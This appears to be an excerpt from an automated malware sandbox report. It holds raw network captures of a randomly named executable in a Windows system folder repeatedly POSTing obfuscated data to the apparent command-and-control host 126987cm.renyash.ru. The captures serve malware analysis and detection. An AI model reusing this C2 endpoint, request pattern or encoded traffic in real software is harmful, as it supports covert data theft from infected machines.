                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcYVCwDvly1uUkhHL9voo2FJ9j%2B6%2BdmcyVHI5Q69wjnKJ3SMR4TXwULCFvAqS1qC3W95adXztBK29eThFSoU7Z%2BdDj4PhcNV5Yw0o6a2Lgz0A5sJ6UoZYWKTZNkOJLO2%2BYeuByhn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d7c5d7e434f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3934&min_rtt=1588&rtt_var=5287&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=71723&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.449751172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:33.604304075 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:33.952194929 CET1788OUTData Raw: 51 55 5e 50 56 40 5c 53 5d 56 5b 57 54 5f 51 5d 58 53 58 5d 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU^PV@\S]V[WT_Q]XSX][VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["32X"2X =?^'.;6 ('64T'0.*%5B?4X%!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:34.066788912 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:34.327893019 CET959INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=De3J1ELG093F9c156s37RNIKb6%2BzPsYVy7Q9eheeNaset%2BHSQ21l8QvFF%2BpZJV1EQKs3pqIGAA2Q%2FNNI9oqC1s%2F%2Byeud9p3%2BnNQf5XcDGuyMnWOBXdjpoUMuxBLgyc0D6%2B62RxOt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d7d9b1b425c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8085&min_rtt=1617&rtt_var=13542&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=27360&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 56 3f 25 27 52 37 31 2e 0f 29 06 3b 58 25 31 26 12 32 33 21 09 3c 3b 30 07 3f 2c 2b 0c 26 02 30 16 27 5c 2a 0b 3f 0b 27 03 2a 36 20 5c 05 1b 3a 03 33 07 01 1c 26 5d 22 0a 28 33 28 15 23 11 2e 12 3e 55 2c 50 37 38 2d 12 25 28 00 0d 26 2a 26 56 29 3f 2f 1a 2a 56 23 50 26 17 2a 51 0f 16 38 56 2a 33 31 04 29 3c 05 07 27 0f 20 12 22 1b 2d 56 31 02 37 55 30 5c 36 10 3f 3d 2b 50 22 0d 2c 0e 31 2c 22 5a 25 3e 0d 55 2e 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a
                                                                                                                                Data Ascii: 98!V?%'R71.);X%1&23!<;0?,+&0'\*?'*6 \:3&]"(3(#.>U,P78-%(&*&V)?/*V#P&*Q8V*31)<' "-V17U0\6?=+P",1,"Z%>U.&^ "S?UV
                                                                                                                                Jan 1, 2025 21:47:34.418241978 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.449752172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:34.365550995 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:34.717814922 CET1072OUTData Raw: 54 51 5b 53 56 40 59 55 5d 56 5b 57 54 5b 51 59 58 57 58 5b 5b 55 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[SV@YU]V[WT[QYXWX[[UWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![02/Z -50>8Y#;4<#T64U$.])!+>7%:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:34.829441071 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:35.110486984 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jT2sUDAfuLE2o7DQa8xMhouV%2BbEJVVI%2BnGmEVbPLk6IGhLEscJT7Ej5LvfEnKmTfvzMsmDNktNHK0qzvAJvvcbwUME9oBmrl7I71NHv%2BybAxdcn19DcKb6diY1pceIGMiswyUfrj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d825ce70f46-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4594&min_rtt=1618&rtt_var=6560&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=57405&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.449753172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:35.244880915 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:35.630832911 CET1060OUTData Raw: 54 55 5e 57 56 40 5c 52 5d 56 5b 57 54 5c 51 5b 58 57 58 5a 5b 53 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU^WV@\R]V[WT\Q[XWXZ[SWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z$!##"1]!X+$-058(;!&8U'3)*61<.2*!^&%X*/
                                                                                                                                Jan 1, 2025 21:47:35.708853006 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:35.924716949 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:35.989300966 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LU3KwK9mYk%2BApxkq29cNnDLe6WSWiqtxzhzY1yBKThgZhLjYnHlGbLV9WkBTbM2%2Ff5%2BbWUEwqmfgC%2FdcLgJojX4MpAisHUf%2BMdSN8Wssm38iOb4tJKRSaGT0TBQCIP7JTQWMrhlF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d87ddb18c8f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4027&min_rtt=1807&rtt_var=5118&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1381&delivery_rate=74611&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.449754172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:36.228956938 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:36.577851057 CET1072OUTData Raw: 51 56 5e 52 53 46 59 50 5d 56 5b 57 54 59 51 59 58 51 58 5d 5b 54 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^RSFYP]V[WTYQYXQX][TWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_'/#1-]6$3Z#8+T($6$V%3:]*62<8'*!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:36.677045107 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:36.943042994 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5nDKZ5sU2p5pq0zsXBHZCBJ%2BrcXAnE2KcZJUqE37%2B9MbZtIz3SbKyfWmJCNgoO3jZDMsp2ZsXyInEXYNTTyLWV3iVCDIgp%2F3X1cUSocndywhhUcCxSmpCtNt2GWER0r8AJZC5ST"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d8ded5c4316-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4102&min_rtt=2025&rtt_var=4913&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=78321&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.449755172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:37.385642052 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:37.733573914 CET1072OUTData Raw: 54 53 5b 54 53 44 59 56 5d 56 5b 57 54 5e 51 5b 58 52 58 59 5b 57 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[TSDYV]V[WT^Q[XRXY[WWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'!$"!=]57^$3"+47U#&(T0>@6?-?2!^&%X*/
                                                                                                                                Jan 1, 2025 21:47:37.840023994 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:38.100986958 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2FAVLXzeXZGglF3l21dUvLRT5kiIwhkc2%2BM%2BA9s9UZCLDa90BLIHq9NXchAWFZLXC4coyOWIxjX1H8Scplztz%2BOLKloKp2IccXq7xGiqhSijFQHGYnEedDbT1E4BPvDyKsIVnSNo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d9539a743c1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3659&min_rtt=2388&rtt_var=3438&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=116251&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.449756172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:39.087028980 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.449757172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:39.427089930 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:39.780564070 CET1788OUTData Raw: 51 54 5b 5e 53 47 5c 55 5d 56 5b 57 54 5a 51 5b 58 51 58 51 5b 51 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[^SG\U]V[WTZQ[XQXQ[QWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!''#T!6;\0/"+$'!5$6*=?>4^&:!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:39.898937941 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:40.170876026 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CY%2Brtv3l%2BGFcHVtZA4h9W7E4T4IKuRvFAdhtoztQ0uMfMTsyntgZUUM2v5ed%2FJtV8PlgbvxumT6kSPJXfV6l3PRXGm8Dm6GsLpGay7IdjDY8bHP2sPvn%2BJlnKApIcxJ9SC%2B1kfrS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da20fcd5e72-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3902&min_rtt=1606&rtt_var=5195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=73084&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 57 2b 36 27 55 20 22 39 1e 28 28 34 06 26 08 22 58 31 1d 07 40 3f 38 09 58 2b 3f 24 53 26 2c 0a 5b 33 3a 03 56 3e 31 38 11 29 36 20 5c 05 1b 3a 03 30 39 38 02 24 38 2e 0b 3d 33 23 06 34 3f 29 00 28 23 33 0e 23 06 0b 1f 25 28 25 1e 33 03 3e 1e 3c 02 34 05 28 30 38 0d 26 17 2a 51 0f 16 38 57 28 20 3e 5d 28 2c 05 07 24 21 38 12 21 1b 2a 09 25 2b 09 52 24 39 3e 5c 2b 3e 3f 1b 36 23 24 0c 32 02 35 01 32 07 33 1b 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!W+6'U "9((4&"X1@?8X+?$S&,[3:V>18)6 \:098$8.=3#4?)(#3#%(%3><4(08&*Q8W( >](,$!8!*%+R$9>\+>?6#$2523,:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.449758172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:39.551760912 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:39.905549049 CET1064OUTData Raw: 51 51 5b 52 56 4b 59 56 5d 56 5b 57 54 5c 51 52 58 50 58 5c 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ[RVKYV]V[WT\QRXPX\[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!3"(#!7_3(X"<(4#U5R3:)%:>>2:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:40.023355961 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:40.301465034 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHTBCF8G1IlTaR%2BQ2xKY%2FC65L99wzcWXkMK2I1AC7zGq0n%2B1Fk6RkaHPurrjCPvPfPsgNHAgod5faHkWcS5XBoOqIGfBQkJfLhf7grVtUK1yOiHoyAn2Tu2sn4S4hBdqb0G2Jkow"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da2da04f797-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7835&min_rtt=1549&rtt_var=13153&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=28164&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.449759172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:40.425106049 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:40.780323982 CET1072OUTData Raw: 54 54 5b 54 53 47 59 5f 5d 56 5b 57 54 54 51 5d 58 56 58 5d 5b 56 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[TSGY_]V[WTTQ]XVX][VWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^$1;"1.5-7'=7#8(?7U!C$R'V&X=%*<(%*!^&%X*
                                                                                                                                Jan 1, 2025 21:47:40.887123108 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:41.144221067 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXaz6kbpQZSyvy5%2B9itvP48075IHXDXayZEH37yv%2B3fUduwmanMK8L8pm7TaKweyNgx41LAVYSYQXbudlNxVRQsNWdC92bJDOVD4EQ7JakV93%2F%2BUbQQSnZeVqlcPhDNCV3qKNmuh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da83b6a41a9-EWR
